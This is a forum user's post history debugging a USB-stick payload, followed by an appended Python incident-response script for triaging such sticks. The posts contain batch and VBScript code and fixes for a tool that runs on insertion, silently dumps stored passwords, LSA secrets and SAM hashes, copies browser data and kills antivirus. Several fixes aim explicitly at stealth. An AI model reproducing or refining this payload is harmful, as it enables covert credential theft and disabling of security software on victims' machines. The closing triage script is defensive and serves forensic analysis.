Tmbomber
Active Members
Posts: 59
Everything posted by Tmbomber

  1. < sigh > wrong on both counts. It's late & I'm sleepy. I'll give it another look tomorrow. Night guys, & thanks Leapo for the Mad Props :)
  2. Ok, first blush...

         +----------------------------------+
         + [Dump Network PW] +
         +----------------------------------+
         -----------------------------------------------------------------------------------------------------------------------------
         +----------------------------------+
         + [Dump Mail PW] +
         +----------------------------------+
         -----------------------------------------------------------------------------------------------------------------------------
         +----------------------------------+
         + [Dump Firefox PW] +
         +----------------------------------+
         The system cannot find the path specified.
         -----------------------------------------------------------------------------------------------------------------------------
         +----------------------------------+
         + [Dump IE PW] +
         +----------------------------------+
         -----------------------------------------------------------------------------------------------------------------------------
         +----------------------------------+
         + [Dump Messenger PW] +
         +----------------------------------+
         -----------------------------------------------------------------------------------------------------------------------------
         +----------------------------------+
         + [Dump Cache] +
         +----------------------------------+
         The system cannot find the path specified.
         -----------------------------------------------------------------------------------------------------------------------------
         +----------------------------------+
         + [Dump LSA secrets] +
         +----------------------------------+
         -----------------------------------------------------------------------------------------------------------------------------
         +----------------------------------+
         + [Dump Product Keys] +
         +----------------------------------+
         The system cannot find the path specified.
         <my ip address wuz here>
         -----------------------------------------------------------------------------------------------------------------------------
         +----------------------------------+
         + [Dump URL History] +
         +----------------------------------+
         Input Error: Can not find script file "D:\SYSTEM\PROGS\SYSTEM\PROGS\SCRIPT\DUH.vbs".
         -----------------------------------------------------------------------------------------------------------------------------
         +----------------------------------+
         + [Dump Updates-List] +
         +----------------------------------+
         The system cannot find the path specified.
         <my ip address wuz here>
         -----------------------------------------------------------------------------------------------------------------------------
         +----------------------------------+
         + [Port Scan] +
         +----------------------------------+
         The system cannot find the path specified.
         <my ip address wuz here>
         -----------------------------------------------------------------------------------------------------------------------------

     This was done on an XP x64 machine. I had several small alert windows pop up saying "Error 5". Still digging into it.

     One note:

         Input Error: Can not find script file "D:\SYSTEM\PROGS\SYSTEM\PROGS\SCRIPT\DUH.vbs".

     refers to:

         ECHO +----------------------------------+ >> %log% 2>&1
         ECHO + [Dump URL History] + >> %log% 2>&1
         ECHO +----------------------------------+ >> %log% 2>&1
         CSCRIPT //nologo %scriptdir%\DUH.vbs >> %log% 2>&1

     This was working. I see you've added scriptdir. scriptdir is defined by:

         IF NOT EXIST "%flshdrv%\CONFIG\U3_Drive.cfg" (SET scriptdir="%flshdrv%\SYSTEM\PROGS\SCRIPT\") ELSE (SET scriptdir=".\SYSTEM\PROGS\SCRIPT\")

     I'm using a U3 drive, so the ELSE part is being used. I'm thinking we're already in \system\progs, so that line defined scriptdir as \system\progs\system\progs\script\.

     I'm thinking all the "The system cannot find the path specified." errors are coming from the "CD %progdir%" and "CD %cd%" lines. I think those CD commands need the /d option ("CD /d %progdir%" and "CD /d %cd%"). I'm going to go try that now.
  3. Discovered something...

         netstat.exe -abn >> %log% 2>&1

     The b option works on some OS's, but not on all. I tried it with and without, and if it's available I think I wanna see the b output. Easy solution, do it twice:

         netstat.exe -an >> %log% 2>&1
         netstat.exe -abn >> %log% 2>&1

     Another thing I noticed... GonZor's payload launches all the password programs without opening windows... Hey GonZor... How'd ya pull that one off??? (presently trying to reverse engineer what ya did)
  4. Well... Implement the fixes I posted and disable IE PW, LSA secrets, mail PW, MSN Messenger PW, Network PW, and AVKILL and it runs in stealth. How about helping with the debugging???
  5. Yup, that was it. Now AVKill only opens one DOS window and the log file is a lot cleaner...

     Other issues... On XP x64 Menu.bat still gives about four or five "No Disk" errors when you run it. This doesn't happen with standard XP. I don't get any "No Disk" errors with XP standard or x64 when the payload runs.

     Moved:

         :: Opens the logs folder
         IF NOT EXIST %config%\Open_Drive_Logs.cfg GOTO SkipOpenDrv
         start /wait %flshdrv%\LOGS\
         :SkipOpenDrv

         :: Opens the root of the drive folder
         IF NOT EXIST %config%\Open_Drive_Root.cfg GOTO SkipOpenDrvRt
         start /wait %flshdrv%
         :SkipOpenDrvRt

     to the bottom of the .bat file. That way the window opens when things are all done. There is a delay depending on what all you have turned on, but for stealth I'd have the "open window" feature turned off anyway.

         IF NOT EXIST %config%\Dump_Mail_PWP.cfg GOTO SkipMailPW
         ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
         ECHO +----------------------------------+ >> %log% 2>&1
         ECHO + [Dump Mail PW] + >> %log% 2>&1
         ECHO +----------------------------------+ >> %log% 2>&1
         %progdir%\mailpv.exe /stext %tmplog% >> %log% 2>&1
         COPY %log%+%tmplog%* %log% >> NUL
         DEL /f /q %tmplog% >NUL
         :SkipMailPW

     In the top line, Dump_Mail_PWP.cfg should be Dump_Mail_PW.cfg.

         IF NOT EXIST %config%\Dump_Updates_List.cfg GOTO SkipUdateList
         ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
         ECHO +----------------------------------+ >> %log% 2>&1
         ECHO + [Dump Updates-List] + >> %log% 2>&1
         ECHO +----------------------------------+ >> %log% 2>&1
         %progdir%\wul.exe /stext %tmplog% >> %log% 2>&1
         COPY %log%+%tmplog%* %log% >> NUL
         DEL /f /q %tmplog% >NUL
         :SkipUdateList

     First line, Dump_Updates_List.cfg should read as: Dump_Update_List.cfg

     Dump Mail PW, Dump Network PW, Dump Messenger PW, and Dump LSA Secrets all open windows and need to be manually closed. Dump Firefox PW can't seem to find the Firefox directory on x64. I haven't checked it on standard XP yet.

     Here's a fun one... If you have Dump IE PW and Dump Messenger PW turned on, for some reason the tmplog isn't deleted at the end of Dump IE PW; if Dump Messenger PW doesn't generate output, the tmplog from Dump IE PW gets put in the Dump Messenger PW's output block. It seems the tmplog isn't being deleted on several occasions. (I'm still trying to figure out why)
  6. A big one just cropped up. It looks like Go.vbs is executing multiple copies of start.bat. (it explains why the beginning of my log file is so messed up)

     Here's the FOR loop from GonZor's GO.vbs:

         For Each objDrive in colDrives
             If objFSO.FileExists(objDrive.DriveLetter & ":\System\SRC\drv.dat") Then
                 strPath = objDrive.Driveletter & ":"
                 If objFSO.FileExists(strPath & "\System\SRC\U3.dat") Then
                     objShell.Run ".\LaunchU3.exe -a"
                 End If
                 If objFSO.FileExists(strPath & "\System\SRC\PL.dat") Then
                     objShell.Run ".\System\SRC\go.bat " & strPath , 0, False
                 End If
             End If
         Next

     and here's yours:

         For Each objDrive in colDrives
             If objFSO.FileExists(strPath & "\SYSTEM\Start.bat") Then
                 objShell.Run ".\SYSTEM\Start.bat " & strPath , 0, False
             End If
         Next

     GonZor's got that launcher thing in there, but notice he sets the variable "strPath" in the third line. Yours uses it in the second line, but it's never set. I think this might work:

         For Each objDrive in colDrives
             strPath = objDrive.Driveletter & ":"
             If objFSO.FileExists(objDrive.DriveLetter & ":\SYSTEM\Start.bat") Then
                 objShell.Run ".\System\Start.bat " & strPath , 0, False
             End If
         Next

     I'll be giving it a try tomorrow night.
  7. Thank you for posting your update :)

     OK, more bug hunting in no particular order. For some reason, the beginning of my log files looks like:

         -----------------------------------------------------------------------------------------------------------------------------
         +----------------------------------+
         -----------------------------------------------------------------------------------------------------------------------------
         +----------------------------------+
         -----------------------------------------------------------------------------------------------------------------------------
         + [Dump SAM FGDUMP] +
         +----------------------------------+
         +----------------------------------+
         -----------------------------------------------------------------------------------------------------------------------------
         +----------------------------------+
         + [Dump Firefox PW] +
         +----------------------------------+
         Error : Firefox profile directory does not exist..
         You have entered profile path = [\FirePassword.exe]
         FirePassword (Ver 2.0.1) : Firefox Username & Password List Decryptor by Nagareshwar Y Talekar
         For latest version visit http://www.securityxploded.com.
         Usage : .\SYSTEM\PROGS\ [-m "master password" ] [Firefox_Profile_Directory]
         -----------------------------------------------------------------------------------------------------------------------------
         +----------------------------------+
         + [Dump IE PW] +
         +----------------------------------+
         ==================================================
         Entry Name : xxx
         Type : xxx
         Stored In : xxx
         User Name : xxx
         Password : xxx
         ==================================================

     It's not even outputting:

         :: Logged modules
         :: Header information
         ECHO ----------------------------------------------------------------------------------------------------------------------------- > %log% 2>&1
         ECHO Leapos Payload [Time Started: %date% %time%] >> %log% 2>&1
         ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
         ECHO Computer Name is: %computername% and the Logged on User Is: %username% >> %log% 2>&1

     which confuses me quite a bit. (btw, notice that the first echo line there only has one > at the end of it)

     The "no disk" error still persists when running Menu.bat (at least on my machine), but doesn't happen when you're actually sticking the thumb drive in a machine. So good job there.

     Just noticed a minor one in Start.bat...

         :: NetScape Data
         mkdir %logdir%\%computername%\Slurp_Data\NetScape\
         xcopy "C:\Documents and Settings\%username%\Application Data\Netscape\NSB\Profiles\*.db" "%logdir%\Slurp_Data\NetScape\" /s /c /q /r /h /y
         xcopy "C:\Documents and Settings\%username%\Application Data\Netscape\NSB\Profiles\*.dat" "%logdir%\Slurp_Data\NetScape\" /s /c /q /r /h /y
         xcopy "C:\Documents and Settings\%username%\Application Data\Netscape\NSB\Profiles\*bookmarks.html" "%logdir%\Slurp_Data\NetScape\" /s /c /q /r /h /y

         :: Opera Data
         mkdir %logdir%\Slurp_Data\Opera\
         xcopy "C:\Documents and Settings\%username%\Application Data\Opera\Opera\profile\*.dat" "%logdir%\Slurp_Data\Opera\" /s /c /q /r /h /y
         xcopy "C:\Documents and Settings\%username%\Application Data\Opera\Opera\mail\*.dat" "%logdir%\Slurp_Data\Opera\" /s /c /q /r /h /y
         xcopy "C:\Documents and Settings\%username%\Application Data\Opera\Opera\mail\*.ini" "%logdir%\Slurp_Data\Opera\" /s /c /q /r /h /y

     Notice the difference in the mkdir lines. The one for Netscape has an extra %computername% thrown in there; that creates an extra computername directory inside the computername directory. Netscape's mkdir line is the only one like it, so just removing the extra %computername%\ will clean up the log directory a bit.

         :: Checks to see if the payload is disarmed
         IF NOT EXIST %flshdrv%\CONFIG\Disarm_Payload.cfg GOTO SkipDisarm
         IF EXIST %config%\Disarm_Payload.cfg GOTO End
         :SkipDisarm

         :: Sets Variables and paths to clean up pathnams later on
         IF NOT EXIST %flshdrv%\LOGS\%computername% MD %flshdrv%\LOGS\%computername%
         SET logdir="%flshdrv%\LOGS\%computername%
         SET log="%flshdrv%\LOGS\%computername%\%computername%-[%Year%%Month%%Day%-%Hour%%Minute%%Second%].log"
         SET tmplog="%flshdrv%\LOGS\%computername%\%computername%_TEMP.log"
         IF NOT EXIST "%flshdrv%\CONFIG\U3_Drive.cfg" (SET progdir="%flshdrv%\SYSTEM\PROGS\") ELSE (SET progdir=".\SYSTEM\PROGS\")
         SET config="%flshdrv%\CONFIG\"

     I'm afraid we have another %config% being used before config is defined issue.

     Port scan appears to be dumping its help file. I'm uncertain why. It appears to dump its information to the templog file, then appends templog to the normal log file. I'd add a -v to "%progdir%\portqry -local -l %tmplog% >> %log% 2>&1" just to get more verbose output. Also for some reason a templog file is being left. It looks like it should be deleted, but for some reason it's left after the .bat file is done. I'll have to think on that one.

     AVKill still pops up the DOS windows. (like 8 of them) I'm still unsure how to deal with that. For the time being I'm disabling AVKill and just manually turning off the AV before inserting the thumb drive.

     Three of the password recovery programs are popping up windows and not closing them. It's late & I don't remember which. I'll check that more tomorrow.

     And finally.... Running this on an XP x64 machine causes a lot of the programs to fail. I only wind up with about half the information. I'm looking into that one too.
  8. Actually, I was poking around a bit, trying a few changes... Of course, having start.bat restore itself kinda messes *that* up :)
  9. Hi, new to the forum & have been playing with Leapo's payload. Noticed a few things in Start.bat...

         :: Performs a safety check. if the file safety.txt is found on the root of your C:\ drive, the payload will not run by default.
         IF NOT EXIST %config%\Safety_Check.cfg GOTO SkipSafetyCheck
         IF EXIST C:\safety.txt GOTO End
         :SkipSafetyCheck

         :: Finds the location of the flash partition and set master variable.
         @ECHO off
         IF EXIST ..\CONFIG\Test_Mode.cfg GOTO TestMode
         FOR %%i IN ( B C D E F G H I J K L M N O P Q R S T U V W X Y Z ) DO (
             IF EXIST %%i:\CONFIG\Drive_Location.cfg (
                 SET flshdrv=%%i:\
             )
         )

         :: Sets Variables and paths
         IF NOT EXIST %flshdrv%\LOGS\%computername% MD %flshdrv%\LOGS\%computername%
         SET logdir="%flshdrv%\LOGS\%computername%
         SET log="%flshdrv%\LOGS\%computername%\%computername%-[%Year%%Month%%Day%-%Hour%%Minute%%Second%].log"
         SET tmplog="%flshdrv%\LOGS\%computername%\%computername%_TEMP.log"
         IF NOT EXIST "%flshdrv%\CONFIG\U3_Drive.cfg" (SET progdir="%flshdrv%\SYSTEM\PROGS\") ELSE (SET progdir=".\SYSTEM\PROGS\")
         SET config="%flshdrv%\CONFIG\"

     First, please notice that the second line references %config%, but it isn't defined until the bottom of the block I quoted. Second, just before your FOR loop you have a conditional to branch off to TestMode, which doesn't have a destination label (I'm assuming you had one further down for testing something???). And third, the multiple "No Disk" errors appear to be coming from the FOR loop.

     I was playing with GonZor's payload and noticed that his "SET LOG PATHS" section looks like:

         @ECHO on
         CD \System\SRC >NUL
         :: SET LOG PATHS
         IF NOT EXIST %1\System\Logs\%computername% ( MD %1\System\Logs\%computername% )
         SET logdir="%1\System\Logs\%computername%
         SET log="%1\System\Logs\%computername%\%computername%-[%Year%%Month%%Day%-%Hour%%Minute%%Second%].log"
         SET tmplog="%1\System\Logs\%computername%\%computername%_TEMP.log"
         SET include="%1\System\SRC\Include
         SET /p eipurl=<"%1\System\SRC\Include\EIP.dat"
         SET U3="%cd%

     Notice that he doesn't set a %flashdrv%; he's using %1, which is the first parameter passed from go.vbs. Your go.vbs is passing the same parameter, so you should be able to get rid of that FOR loop. (Is there some reason you did it the way you did that I'm unaware of???)

     I also get the "No Disk" error when I run Menu.bat. (for the same reason) It's not as critical there, seeing Menu.bat is only run when I wanna change the thumbdrive's configuration.

     Your csrss.exe is killing Avast alright, but for some reason is opening a lot of DOS windows. I haven't figured that one out yet.

     BTW, is Start.bat restored from Backup.rar???
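The posts above name the files that make up these drive layouts (Leapo's CONFIG\Drive_Location.cfg, CONFIG\U3_Drive.cfg and SYSTEM\Start.bat; GonZor's System\SRC\drv.dat, go.bat, PL.dat and U3.dat), the header lines the payload writes at the top of each log under LOGS\%computername% ("Leapos Payload [Time Started: ...]" and "Computer Name is: ... and the Logged on User Is: ..."), the "+ [Dump ...] +" module banners, and the %computername%_TEMP.log that several posts say is left behind. From the incident-response side, the useful question about such a stick is what was on it and which machines it was run against. The following Python triage script is an added example, not code from Leapo, GonZor or anyone in this thread: given a recovered drive's mount point, it reports which marker files are present, extracts host, user, start time and module list from each log, and flags leftover tmplogs. The MARKER_FILES list, the regular expressions, all function names and the sample drive and log that demo() constructs are my own assumptions built from the strings quoted in the posts.

```python
"""Triage a recovered USB stick suspected of carrying a Switchblade-style payload.

Added example for this thread, not Leapo's or GonZor's code. File names and log
strings come from the posts; the drive that demo() builds is constructed.
"""
import os
import re
import tempfile
from pathlib import Path

# Files the posts name as part of the two drive layouts (assumed marker set).
MARKER_FILES = [
    "CONFIG/Drive_Location.cfg", "CONFIG/U3_Drive.cfg",  # Leapo: FOR-loop marker, U3 path switch
    "SYSTEM/Start.bat",                                   # Leapo: launched by go.vbs
    "System/SRC/drv.dat", "System/SRC/go.bat",            # GonZor: tested by his go.vbs
    "System/SRC/PL.dat", "System/SRC/U3.dat",
]

# Header lines produced by the "Logged modules" ECHO block quoted in post 7.
STARTED_RE = re.compile(r"Leapos Payload \[Time Started: (?P<started>[^\]]+)\]")
HOST_RE = re.compile(r"Computer Name is: (?P<host>\S+) and the Logged on User Is: (?P<user>\S+)")
# Module banner such as "+     [Dump Network PW]     +" between two +----+ rules.
SECTION_RE = re.compile(r"^\+\s*\[(?P<name>[^\]]+)\]\s*\+$")


def find_markers(root):
    """List which MARKER_FILES exist under root; FAT is case-insensitive, so compare lowercased."""
    root = Path(root)
    present = set()
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            present.add(Path(dirpath, name).relative_to(root).as_posix().lower())
    return [m for m in MARKER_FILES if m.lower() in present]


def parse_log(text):
    """Pull host, user, start time and the module banners out of one payload log."""
    info = {"started": None, "host": None, "user": None, "sections": []}
    for raw in text.splitlines():
        line = raw.strip()
        if m := STARTED_RE.search(line):
            info["started"] = m.group("started")
        if m := HOST_RE.search(line):
            info["host"], info["user"] = m.group("host"), m.group("user")
        if m := SECTION_RE.match(line):
            info["sections"].append(m.group("name").strip())
    return info


def triage(root):
    """Summarise a mounted drive: marker files, one entry per victim log, leftover tmplogs."""
    root = Path(root)
    report = {"markers": find_markers(root), "logs": [], "temp_logs": []}
    for path in sorted(root.rglob("*.log")):
        rel = path.relative_to(root)
        if "logs" not in {p.lower() for p in rel.parts[:-1]}:
            continue  # only the payload's LOGS tree is of interest
        if path.name.upper().endswith("_TEMP.LOG"):
            report["temp_logs"].append(rel.as_posix())  # the tmplog the posts say is left behind
            continue
        entry = parse_log(path.read_text(errors="replace"))
        entry["path"] = rel.as_posix()
        report["logs"].append(entry)
    return report


# Constructed sample log in the shape the quoted ECHO lines produce (rules shortened).
RULE = "-" * 40
SAMPLE_LOG = "\n".join([
    RULE, "Leapos Payload [Time Started: Thu 01/03/2008 23:15:42.10]", RULE,
    "Computer Name is: WORKSTATION01 and the Logged on User Is: jdoe", RULE,
    "+----------------------------------+", "+         [Dump Network PW]        +",
    "+----------------------------------+", RULE,
    "+----------------------------------+", "+           [Dump Mail PW]         +",
    "+----------------------------------+", "The system cannot find the path specified.", RULE,
    "+----------------------------------+", "+            [Port Scan]           +",
    "+----------------------------------+", "",
])


def build_sample_drive(dest):
    """Create a constructed drive image under dest that mimics the layout from the posts."""
    root = Path(dest)
    for rel in MARKER_FILES[:4]:  # Drive_Location.cfg, U3_Drive.cfg, Start.bat, drv.dat
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        (root / rel).write_text("")
    logdir = root / "LOGS" / "WORKSTATION01"
    logdir.mkdir(parents=True, exist_ok=True)
    (logdir / "WORKSTATION01-[20080103-231542].log").write_text(SAMPLE_LOG)
    (logdir / "WORKSTATION01_TEMP.log").write_text("leftover tmplog")
    return root


def demo():
    """Build the sample drive in a fresh temp directory and triage it."""
    return triage(build_sample_drive(tempfile.mkdtemp(prefix="usb_triage_")))
```

Run triage() against the mount point of the stick (read-only, ideally from an image) rather than the live drive; the host and user fields tell you which machines need credential resets, and a populated temp_logs list means a run was cut short or hit the deletion bug the posts describe, so the stray file may hold output that never made it into the main log.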